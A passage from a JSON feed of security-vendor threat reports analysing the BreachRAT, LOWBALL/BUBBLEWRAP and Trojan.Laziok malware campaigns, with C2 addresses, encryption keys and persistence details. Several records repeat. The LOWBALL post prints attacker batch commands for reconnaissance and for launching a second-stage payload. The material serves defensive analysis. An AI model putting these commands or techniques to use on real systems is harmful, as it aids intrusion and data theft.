4) suggests that it was created fairly recently by the user \u201cBhopal\u201d.\n\n \n\n\n**Figure 4: Metadata of the Document**\n\nThe payload is a backdoor that we call the Breach Remote Administration Tool (BreachRAT) written in C++. We had not previously observed this payload used by these threat actors. The malware name is derived from the hardcoded PDB path found in the RAT: C:\\Work\\Breach Remote Administration Tool\\Release\\Client.pdb. This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT.\n\nThe following is a brief summary of the activities performed by the dropped payload:\n\n1\\. Decrypts resource 1337 using a hard-coded 14-byte key \"MjEh92jHaZZOl3\". The encryption/decryption routine (refer to Figure 5) can be summarized as follows:\n\n \n\n\n**Figure 5: Encryption/ Decryption Function**\n\n * Generate an array of integers from 0x00 to 0xff\n * Scrambles the state of the table using the given key\n * Encrypts or decrypts a string using the scrambled table from (b).\n * A python script, which can be used for decrypting this resource, is provided in the appendix below.\n\n2\\. The decrypted resource contains the C2 server\u2019s IP address as well as the mutex name.\n\n3\\. If the mutex does not exist and a Windows Startup Registry key with name \u201cSystem Update\u201d does not exist, the malware performs its initialization routine by:\n\n * Copying itself to the path %PROGRAMDATA%\\svchost.exe\n * Sets the Windows Startup Registry key with the name \u201cSystem Update\u201d which points to the above dropped payload.\n\n4\\. The malware proceeds to connect to the C2 server at 5.189.145.248 at regular intervals through the use of TCP over port 10500. Once a successful connection is made, the malware tries to fetch a response from the server through its custom protocol.\n\n5\\. Once data is received, the malware skips over the received bytes until the start byte 0x99 is found in the server response. The start byte is followed by a DWORD representing the size of the following data string.\n\n6\\. The data string is encrypted with the above-mentioned encryption scheme with the hard-coded key \u201cAjN28AcMaNX\u201d.\n\n7\\. The data string can contain various commands sent by the C2 server. These commands and their string arguments are expected to be in Unicode. The following commands are accepted by the malware:\n\n\n\n**Conclusion** \nAs with previous spear-phishing attacks seen conducted by this group, topics related to Indian Government and Military Affairs are still being used as the lure theme in these attacks and we observed that this group is still actively expanding their toolkit. It comes as no surprise that cyber attacks against the Indian government continue, given the historically tense relations in the region.\n\n**Appendix**\n\n****Encryption / Decryption algorithm translated into Python****\n\n\n", "edition": 2, "cvss3": {}, "published": "2016-06-03T01:30:00", "type": "fireeye", "title": "APT Group Sends Spear Phishing Emails to Indian Government Officials", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2016-06-03T01:30:00", "id": "FIREEYE:3A68F8390FB41E5497C5AA3B9BEBA5A6", "href": "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-17T14:44:06", "description": "**Introduction** \nOn May 18, 2016, FireEye Labs observed a suspected Pakistan-based APT group sending spear phishing emails to Indian government officials. This threat actor has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets.\n\nThis group frequently uses a toolset that consists of a downloader and modular framework that uses plugins to enhance functionality, ranging from keystroke logging to targeting USB devices. We initially reported on this threat group and their UPDATESEE malware in our FireEye Intelligence Center in February 2016. Proofpoint also discussed the threat actors, whom they call [Transparent Tribe](<https://www.proofpoint.com/us/threat-insight/post/Operation-Transparent-Tribe>), in a March blog post.\n\nIn this latest incident, the group registered a fake news domain, timesofindiaa[.]in, on May 18, 2016, and then used it to send spear phishing emails to Indian government officials on the same day. The emails referenced the Indian Government\u2019s [7th Central Pay Commission (CPC)](<http://zeenews.india.com/business/news/economy/7th-pay-commission-govt-employees-likely-to-get-huge-pay-checks-by-june-july-2016_1880390.html>). These Commissions periodically review the pay structure for Indian government and military personnel, a topic that would be of interest to government employees.\n\n**Malware Delivery Method** \nIn all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the [CVE-2012-0158 vulnerability](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to drop a malicious payload.\n\nIn previous incidents involving this threat actor, we observed them using malicious documents hosted on websites about the Indian Army, instead of sending these documents directly as an email attachment.\n\nThe email (Figure 1) pretends to be from an employee working at Times of India (TOI) and requests the recipient to open the attachment associated with the 7th Pay Commission. Only one of the recipient email addresses was publicly listed on a website, suggesting that the actor harvested the other non-public addressees through other means.\n\n** \nFigure 1: Contents of the Email**\n\nA review of the email header data from the spear phishing messages showed that the threat actors sent the emails using the same infrastructure they have used in the past.\n\n**Exploit Analysis** \nDespite being an older vulnerability, many threat actors continue to leverage [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to exploit Microsoft Word. This exploit file made use of the same shellcode that we have observed this actor use across a number of spear phishing incidents.\n\n \n\n\n**Figure 2: Exploit Shellcode used to Locate and Decode Payload**\n\nThe shellcode (Figure 2) searches for and decodes the executable payload contained in memory between the beginning and ending file markers 0xBABABABA and 0xBBBBBBBB, respectively. After decoding is complete, the shellcode proceeds to save the executable payload into %temp%\\svchost.exe and calls WinExec to execute the payload. After the payload is launched, the shellcode runs the following commands to prevent Microsoft Word from showing a recovery dialog:\n\n\n\nLastly, the shellcode overwrites the malicious file with a decoy document related to the Indian defense forces\u2019 pay scale / matrix (Figure 3), displays it to the user and terminates the exploited instance of Microsoft Word.\n\n \n\n\n**Figure 3: Decoy Document related to 7th Pay Commission**\n\nThe decoy document's metadata (Figure 4) suggests that it was created fairly recently by the user \u201cBhopal\u201d.\n\n \n\n\n**Figure 4: Metadata of the Document**\n\nThe payload is a backdoor that we call the Breach Remote Administration Tool (BreachRAT) written in C++. We had not previously observed this payload used by these threat actors. The malware name is derived from the hardcoded PDB path found in the RAT: C:\\Work\\Breach Remote Administration Tool\\Release\\Client.pdb. This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT.\n\nThe following is a brief summary of the activities performed by the dropped payload:\n\n1\\. Decrypts resource 1337 using a hard-coded 14-byte key \"MjEh92jHaZZOl3\". The encryption/decryption routine (refer to Figure 5) can be summarized as follows:\n\n \n\n\n**Figure 5: Encryption/ Decryption Function**\n\n * Generate an array of integers from 0x00 to 0xff\n * Scrambles the state of the table using the given key\n * Encrypts or decrypts a string using the scrambled table from (b).\n * A python script, which can be used for decrypting this resource, is provided in the appendix below.\n\n2\\. The decrypted resource contains the C2 server\u2019s IP address as well as the mutex name.\n\n3\\. If the mutex does not exist and a Windows Startup Registry key with name \u201cSystem Update\u201d does not exist, the malware performs its initialization routine by:\n\n * Copying itself to the path %PROGRAMDATA%\\svchost.exe\n * Sets the Windows Startup Registry key with the name \u201cSystem Update\u201d which points to the above dropped payload.\n\n4\\. The malware proceeds to connect to the C2 server at 5.189.145.248 at regular intervals through the use of TCP over port 10500. Once a successful connection is made, the malware tries to fetch a response from the server through its custom protocol.\n\n5\\. Once data is received, the malware skips over the received bytes until the start byte 0x99 is found in the server response. The start byte is followed by a DWORD representing the size of the following data string.\n\n6\\. The data string is encrypted with the above-mentioned encryption scheme with the hard-coded key \u201cAjN28AcMaNX\u201d.\n\n7\\. The data string can contain various commands sent by the C2 server. These commands and their string arguments are expected to be in Unicode. The following commands are accepted by the malware:\n\n\n\n**Conclusion** \nAs with previous spear-phishing attacks seen conducted by this group, topics related to Indian Government and Military Affairs are still being used as the lure theme in these attacks and we observed that this group is still actively expanding their toolkit. It comes as no surprise that cyber attacks against the Indian government continue, given the historically tense relations in the region.\n\n**Appendix**\n\n****Encryption / Decryption algorithm translated into Python****\n\n\n", "edition": 2, "cvss3": {}, "published": "2016-06-03T01:30:00", "type": "fireeye", "title": "APT Group Sends Spear Phishing Emails to Indian Government Officials", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2016-06-03T01:30:00", "id": "FIREEYE:6590BB51C6F8AABFD43517A1C445F65D", "href": "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "description": "FireEye Threat Intelligence analysts identified a spear phishing campaign carried out in August 2015 targeting Hong Kong-based media organizations. A China-based cyber threat group, which FireEye tracks as an uncategorized advanced persistent threat (APT) group and other researchers refer to as \u201cadmin@338,\u201d may have conducted the activity.[1] The email messages contained malicious documents with a malware payload called LOWBALL. LOWBALL abuses the Dropbox cloud storage service for command and control (CnC). We collaborated with Dropbox to investigate the threat, and our cooperation revealed what may be a second, similar operation. The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3]\n\n### A Cyber Campaign Likely Intended to Monitor Hong Kong Media During a Period of Crisis\n\nThe threat group has previously used newsworthy events as lures to deliver malware.[4] They have largely targeted organizations involved in financial, economic and trade policy, typically using publicly available RATs such as Poison Ivy, as well some non-public backdoors.[5]\n\nThe group started targeting Hong Kong media companies, probably in response to political and economic challenges in Hong Kong and China. The threat group\u2019s latest activity coincided with the announcement of criminal charges against democracy activists.[6] During the past 12 months, Chinese authorities have faced several challenges, including large-scale protests in Hong Kong in late 2014, the precipitous decline in the stock market in mid-2015, and the massive industrial explosion in Tianjin in August 2015. In Hong Kong, the pro-democracy movement persists, and the government recently denied a professor a post because of his links to a pro-democracy leader.[7]\n\nMultiple China-based cyber threat groups have targeted international media organizations in the past. The targeting has often focused on Hong Kong-based media, particularly those that publish pro-democracy material. The media organizations targeted with the threat group\u2019s well-crafted Chinese language lure documents are precisely those whose networks Beijing would seek to monitor. Cyber threat groups\u2019 access to the media organization\u2019s networks could potentially provide the government advance warning on upcoming protests, information on pro-democracy group leaders, and insights needed to disrupt activity on the Internet, such as what occurred in mid-2014 when several websites were brought down in denial of service attacks.[8]\n\n### Threat Actors Use Spear Phishing Written in Traditional Chinese Script in Attempted Intrusions\n\nIn August 2015, the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations, including newspapers, radio, and television. The first email references the creation of a Christian civil society organization to coincide with the anniversary of the 2014 protests in Hong Kong known as the Umbrella Movement. The second email references a Hong Kong University alumni organization that fears votes in a referendum to appoint a Vice-Chancellor will be co-opted by pro-Beijing interests.[9]\n\n\n\nFigure 1: Lure Screenshots\n\nThe group\u2019s previous activities against financial and policy organizations have largely focused on spear phishing emails written in English, destined for Western audiences. This campaign, however, is clearly designed for those who read the traditional Chinese script commonly used in Hong Kong.\n\n### LOWBALL Malware Analysis\n\nThe spear phishing emails contained three attachments in total, each of which exploited an older vulnerability in Microsoft Office (CVE-2012-0158):\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nb9208a5b0504cb2283b1144fc455eaaa\n\n| \n\n\u4f7f\u547d\u516c\u6c11\u904b\u52d5 \u6211\u5011\u7684\u7570\u8c61.doc \n \nec19ed7cddf92984906325da59f75351\n\n| \n\n\u65b0\u805e\u7a3f\u53ca\u516c\u4f48.doc \n \n6495b384748188188d09e9d5a0c401a4\n\n| \n\n(\u4ee3\u767c)[\u91c7\u8a2a\u901a\u77e5]\u6e2f\u5927\u6821\u53cb\u95dc\u6ce8\u7d44\u905e\u4fe1\u884c\u52d5.doc \n \nIn all three cases, the payload was the same:\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nd76261ba3b624933a6ebb5dd73758db4\n\n| \n\ntime.exe \n \nThis backdoor, known as LOWBALL, uses the legitimate Dropbox cloud-storage \nservice to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.\n\nAfter execution, the malware will use the Dropbox API to make an HTTP GET request using HTTPS over TCP port 443 for the files:\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nd76261ba3b624933a6ebb5dd73758db4\n\n| \n\nWmiApCom \n \n79b68cdd0044edd4fbf8067b22878644\n\n| \n\nWmiApCom.bat \n \nThe \u201cWmiApCom.bat\u201d file is simply used to start \u201cWmiApCom\u201d, which happens to be the exact same file as the one dropped by the malicious Word documents. However, this is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.\n\nThe threat group monitors its Dropbox account for responses from compromised computers. Once the LOWBALL malware calls back to the Dropbox account, the attackers will create a file called \u201c[COMPUTER_NAME]_upload.bat\u201d which contains commands to be executed on the compromised computer. This batch file is then executed on the target computer, with the results uploaded to the attackers\u2019 Dropbox account in a file named \u201c[COMPUTER_NAME]_download\u201d.\n\nWe observed the threat group issue the following commands:\n\n@echo off \n \n--- \n \ndir c:\\ >> %temp%\\download \n \nipconfig /all >> %temp%\\download \n \nnet user >> %temp%\\download \n \nnet user /domain >> %temp%\\download \n \nver >> %temp%\\download \n \ndel %0 \n \n@echo off \n \ndir \"c:\\Documents and Settings\" >> %temp%\\download \n \ndir \"c:\\Program Files\\ \n \n\" >> %temp%\\download \n \nnet start >> %temp%\\download \n \nnet localgroup administrator >> %temp%\\download \n \nnetstat -ano >> %temp%\\download \n \nThese commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware.\n\nWe observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command:\n\n@echo off \n \n--- \n \nren \"%temp%\\upload\" audiodg.exe \n \nstart %temp%\\audiodg.exe \n \ndir d:\\ >> %temp%\\download \n \nsysteminfo >> %temp%\\download \n \ndel %0 \n \nWe have previously observed the admin@338 group use BUBBLEWRAP. This particular sample connected to the CnC domain accounts.serveftp[.]com, which resolved to an IP address previously used by the threat group, although the IP had not been used for some time prior to this most recent activity:\n\nMD5\n\n| \n\n| \n \n---|---|--- \n \n0beb957923df2c885d29a9c1743dd94b\n\n| \n\naccounts.serveftp.com\n\n| \n\n59.188.0.197 \n \nBUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.\n\n### A Second Operation\n\nFireEye works closely with security researchers and industry partners to mitigate cyber threats, and we collaborated with Dropbox to respond to this activity. The Dropbox security team was able to identify this abuse and put countermeasures in place.\n\nOur cooperation uncovered what appears to be a second, ongoing operation, though we lack sufficient evidence to verify if admin@338 is behind it. The attack lifecycle followed the same pattern, though some of the filenames were different, which indicates that there may be multiple versions of the malware. In addition, while the operation targeting Hong Kong-based media involved a smaller number of targets and a limited duration, we suspect this second operation involves up to 50 targets. At this time, we are unable to identify the victims.\n\nIn this case, after the payload is delivered via an exploit the threat actor places files (named upload.bat, upload.rar, and period.txt, download.txt or silent.txt) in a directory on a Dropbox account. The malware beacons to this directory using the hardcoded API token and attempts to download these files (which are deleted from the Dropbox account after the download):\n\n * upload.bat, a batch script that the compromised machine will execute\n * upload.rar, a RAR archive that contains at least two files: a batch script to execute, and often an executable (sometimes named rar.exe) which the batch script will run and almost always uploads the results of download.rar to the cloud storage account\n * silent.txt and period.txt, small files sizes of 0-4 bytes that dictate the frequency to check in with the CnC\n\nThe threat actor will then download the results and then delete the files from the cloud storage account.\n\n# Conclusion\n\nLOWBALL is an example of malware that abuses cloud storage services to mask its activity from network defenders. The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets.\n\n_A version of this article appeared first on the __FireEye Intelligence Center__. The FireEye Intelligence Center provides access to strategic intelligence, analysis tools, intelligence sharing capabilities, and institutional knowledge based on over 10 years of FireEye and Mandiant experience detecting, responding to and tracking advanced threats. FireEye uses a proprietary intelligence database, along with the expertise of our Threat Intelligence Analysts, to power the Intelligence Center._\n\n[1] FireEye currently tracks this activity as an \u201cuncategorized\u201d group, a cluster of related threat activity about which we lack information to classify with an advanced persistent threat number.\n\n[2] FireEye. Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. <https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf>\n\n[3] FireEye. HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. \n\n[4] Moran, Ned and Alex Lanstein. FireEye. \u201cSpear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370.\u201d 25 March 2014. https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html.\n\n[5] Moran, Ned and Thoufique Haq. FireEye. \u201cKnow Your Enemy: Tracking a Rapidly Evolving APT Actor.\u201d 31 October 2013. FireEye. Poison Ivy: Assessing Damage and Extracting Intelligence\n\n[6] BBC News. \u201cHong Kong student leaders charged over Umbrella Movement.\u2019\u201d 27 August 2015. http://www.bbc.com/news/world-asia-china-34070695.\n\n[7] Zhao, Shirley, Joyce Ng, and Gloria Chan. \u201cUniversity of Hong Kong\u2019s council votes 12-8 to reject Johannes Chan\u2019s appointment as pro-vice-chancellor.\u201d 30 September 2015. http://www.scmp.com/news/hong-kong/education-community/article/1862423/surprise-move-chair-university-hong-kong.\n\n[8] Wong, Alan. Pro-Democracy Media Company\u2019s Websites Attacked. \u201cPro-Democracy Media Company\u2019s Websites Attacked.\u201d New York Times. 18 June 2014. http://sinosphere.blogs.nytimes.com/2014/06/18/pro-democracy-media-companys-websites-attacked/.\n\n[9] \u201cHKU concern group raises proxy fears in key vote.\u201d EIJ Insight. 31 August 2015. http://www.ejinsight.com/20150831-hku-concern-group-raises-proxy-fears-in-key-vote/.\n", "edition": 2, "cvss3": {}, "published": "2015-12-01T08:00:00", "type": "fireeye", "title": "China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2015-12-01T08:00:00", "id": "FIREEYE:840F71EB7FEBB100F9428F0841BEF2CF", "href": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:44", "description": "##### **Introduction**\n\nThrough our multi-flow detection capability, we recently identified malicious actors spreading Trojan.Laziok malware via Google Docs. We observed that the attackers managed to upload the payload to Google Docs in March 2016. During the brief time it was live, users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning. After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.\n\n##### **The Payload**\n\nTrojan.Laziok reportedly serves as a reconnaissance tool that attackers use to collect information about systems they have compromised. It has been seen previously in a cyber espionage campaign targeting the energy sector, particularly in the Middle East[i]. In that campaign, the malware was spread using spam emails with malicious attachments exploiting the CVE-2012-0158 vulnerability.\n\nThe techniques used for delivery in this case involve exploiting users running versions of Internet Explorer that support VBScript.\n\n##### **Attack Delivery Point**\n\nThe attacker stored the first stage of the attack on the Polish domain hosting site cba[.]pl. As seen in Figure 1, the first stage initiates the attack by running obfuscated JavaScript from www.younglean. cba[.]pl/lean/.\n\n\n\nFigure 1. Obfuscated code shown in the response\n\nOnce decoded, the JavaScript unpacks and runs vulnerability CVE-2014-6332 through VBScript execution in Internet Explorer (versions 3 to 11), exploiting the memory corruption vulnerability in Windows Object Linking and Embedding (OLE) Automation to bypass operating system security utilities and other protections and thus enabling attackers to enter into \u201dGodMode\u201d function. CVE-2014-6332 usage, along with GodMode privileges abuse, has been used as a combination since late 2014 via a known PoC[ii], as seen Figures 2a and 2b:\n\n\n\nFigure 2a. CVE-2014-6332 usage\n\n\n\nFigure 2b. Function call to runmumaa() after \u201cGodMode\u201d access changing the safemode flags\n\nNext, the runmaa() function downloads the malicious payload from Google Docs through PowerShell. PowerShell is used to download malware and execute it inside defined %APPDATA% environment variable path via DownloadFile and ShellExecute commands. All VBScript instructions and PowerShell scripts are part of the obfuscated script inside document.write(unescape), shown in Figure 1.\n\nPowerShell is also useful for bypassing anti-virus software because it is able to inject payloads directly in memory. We have previously discussed [active PowerShell data stealing campaigns from Russia](<mailto:https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html>)[iii]. It seems the technique is still popular among campaigns involving infostealers, and this one was able to evade Google Docs security checks. The payload download link from Google Docs \u2013 seen in Figure 3 showing the de-obfuscated code \u2013 fetched live malware for victims who ended up on the aforementioned Polish website.\n\n\n\nFigure 3. Using PowerShell to fetch payload hosted on Google docs link\n\n##### **Payload Details**\n\nThe downloaded payload is infostealer Trojan.Laziok, as evidenced by its callback trace and the presence of the following data:\n\n00406471 PUSH 21279964.00414EED ASCII \"open\" \n0040649C MOV EDX,21279964.004166A8 ASCII \"idcontact.php?COMPUTER=\" \n004064B1 MOV EDX,21279964.00415D6D ASCII \"&steam=\" \n004064D2 MOV EDX,21279964.00416D96 ASCII \"&origin=\" \n004064F3 MOV EDX,21279964.00416659 ASCII \"&webnavig=\" \n00406514 MOV EDX,21279964.00416B17 ASCII \"&java=\" \n00406535 MOV EDX,21279964.00415601 ASCII \"&net=\" \n00406556 MOV EDX,21279964.00414F76 ASCII \"&memoireRAMbytes=\" \n0040656B MOV EDX,21279964.0041628C ASCII \"&diskhard=\" \n0040658E MOV EDX,21279964.00414277 ASCII \"&avname=\" \n004065AF MOV EDX,21279964.00416BFC ASCII \"&parefire=\" \n004065D0 MOV EDX,21279964.0041474A ASCII \"&install=\" \n004065E5 MOV EDX,21279964.00414E12 ASCII \"&gpu=\" \n00406606 MOV EDX,21279964.004164B7 ASCII \"&cpu=\" \n00406659 MOV EDX,21279964.004170F9 ASCII \"bkill.php\" \n004066B9 MOV EDX,21279964.00415B79 ASCII \"0000025C00000C6B000008BB000006ED0000088900000453000004CE0000054100000B75\" \n004066ED MOV EDX,21279964.004149CD ASCII \"install_info.php\" \n00406735 MOV EDX,21279964.00415951 ASCII \"pinginfo.php\" \n00406772 MOV EDX,21279964.00416B6B ASCII \"get.php?IP=\" \n00406787 MOV EDX,21279964.0041463F ASCII \"&COMPUTER=\" \n0040679C MOV EDX,21279964.00416DF5 ASCII \"&OS=\" \n004067B1 MOV EDX,21279964.00415CB8 ASCII \"&COUNTRY=\" \n004067C6 MOV EDX,21279964.00416069 ASCII \"&HWID=\" \n004067DB MOV EDX,21279964.00414740 ASCII \"&INSTALL=\" \n004067F0 MOV EDX,21279964.00415BE3 ASCII \"&PING=\" \n00406805 MOV EDX,21279964.004158E2 ASCII \"&INSTAL=\" \n0040681A MOV EDX,21279964.00414D3E ASCII \"&V=\" \n0040682F MOV EDX,21279964.00414E5D ASCII \"&Arch=\" \n00406872 MOV EDX,21279964.00414166 ASCII \"post.php\" \n00406899 MOV EDX,21279964.00414EB0 ASCII \"*0\"\n\nAbove instructions of the payload, when unpacked, highlight the typical traits of Trojan.Laziok. The infostealer tries to collect information about computer name, CPU details, RAM size, location (country), and installed software and antivirus (AV). Our MVX engine also shows that it attempts to access popular AV files, such as installer files for Kaspersky, McAfee, Symantec and Bitdefender. It also blends in by copying itself to well-known folders and processes such as:\n\nC:\\Documents and Settings\\admin\\Application Data\\System\\Oracle\\smss.exe\n\nThe payload attempts to call back to a known bad Polish server [hxxp://]193.189.117[.]36]\n\nWe observed the first instance of this attack on March 13, 2016. The malware was available on Google Docs until we alerted Google about its presence. Users are not usually able to download malicious content from Google Docs because Google actively scans and blocks malicious content. The fact that this sample was available and downloadable on Google Docs suggests that the malware evaded Google\u2019s security checks. Following our notification, Google promptly removed the malicious file and it can no longer be fetched.\n\n##### **Conclusion**\n\nFireEye\u2019s multi-flow detection mechanism catches this at every level, from the point of entry to the callback \u2013 and the malware is not able to bypass FireEye sandbox security. PowerShell data stealing campaigns have also been observed spreading through document files with embedded macros, so corporate environments need to be extra careful regarding the policy and regulation of PowerShell usage \u2013 especially since the abuse can involve some trusted sources that sometimes have exemptions, with whitelists from some security vendors being one example. Or they can keep using FireEye. \n\n\n[i] http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector \n[ii] http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ \n[iii] https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html\n", "cvss3": {}, "published": "2016-04-21T17:45:00", "type": "fireeye", "title": "PowerShell used for spreading Trojan.Laziok through Google Docs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2014-6332"], "modified": "2016-04-21T17:45:00", "id": "FIREEYE:E9E6074E1BE7D5905706DE1C69AFDCDE", "href": "https://www.fireeye.com/blog/threat-research/2016/04/powershell_used_for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:19", "description": "##### **Introduction**\n\nThrough our multi-flow detection capability, we recently identified malicious actors spreading Trojan.Laziok malware via Google Docs. We observed that the attackers managed to upload the payload to Google Docs in March 2016. During the brief time it was live, users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning. After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.\n\n##### **The Payload**\n\nTrojan.Laziok reportedly serves as a reconnaissance tool that attackers use to collect information about systems they have compromised. It has been seen previously in a cyber espionage campaign targeting the energy sector, particularly in the Middle East[i]. In that campaign, the malware was spread using spam emails with malicious attachments exploiting the CVE-2012-0158 vulnerability.\n\nThe techniques used for delivery in this case involve exploiting users running versions of Internet Explorer that support VBScript.\n\n##### **Attack Delivery Point**\n\nThe attacker stored the first stage of the attack on the Polish domain hosting site cba[.]pl. As seen in Figure 1, the first stage initiates the attack by running obfuscated JavaScript from www.younglean. cba[.]pl/lean/.\n\n\n\nFigure 1. Obfuscated code shown in the response\n\nOnce decoded, the JavaScript unpacks and runs vulnerability CVE-2014-6332 through VBScript execution in Internet Explorer (versions 3 to 11), exploiting the memory corruption vulnerability in Windows Object Linking and Embedding (OLE) Automation to bypass operating system security utilities and other protections and thus enabling attackers to enter into \u201dGodMode\u201d function. CVE-2014-6332 usage, along with GodMode privileges abuse, has been used as a combination since late 2014 via a known PoC[ii], as seen Figures 2a and 2b:\n\n\n\nFigure 2a. CVE-2014-6332 usage\n\n\n\nFigure 2b. Function call to runmumaa() after \u201cGodMode\u201d access changing the safemode flags\n\nNext, the runmaa() function downloads the malicious payload from Google Docs through PowerShell. PowerShell is used to download malware and execute it inside defined %APPDATA% environment variable path via DownloadFile and ShellExecute commands. All VBScript instructions and PowerShell scripts are part of the obfuscated script inside document.write(unescape), shown in Figure 1.\n\nPowerShell is also useful for bypassing anti-virus software because it is able to inject payloads directly in memory. We have previously discussed [active PowerShell data stealing campaigns from Russia](<mailto:https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html>)[iii]. It seems the technique is still popular among campaigns involving infostealers, and this one was able to evade Google Docs security checks. The payload download link from Google Docs \u2013 seen in Figure 3 showing the de-obfuscated code \u2013 fetched live malware for victims who ended up on the aforementioned Polish website.\n\n\n\nFigure 3. Using PowerShell to fetch payload hosted on Google docs link\n\n##### **Payload Details**\n\nThe downloaded payload is infostealer Trojan.Laziok, as evidenced by its callback trace and the presence of the following data:\n\n00406471 PUSH 21279964.00414EED ASCII \"open\" \n0040649C MOV EDX,21279964.004166A8 ASCII \"idcontact.php?COMPUTER=\" \n004064B1 MOV EDX,21279964.00415D6D ASCII \"&steam=\" \n004064D2 MOV EDX,21279964.00416D96 ASCII \"&origin=\" \n004064F3 MOV EDX,21279964.00416659 ASCII \"&webnavig=\" \n00406514 MOV EDX,21279964.00416B17 ASCII \"&java=\" \n00406535 MOV EDX,21279964.00415601 ASCII \"&net=\" \n00406556 MOV EDX,21279964.00414F76 ASCII \"&memoireRAMbytes=\" \n0040656B MOV EDX,21279964.0041628C ASCII \"&diskhard=\" \n0040658E MOV 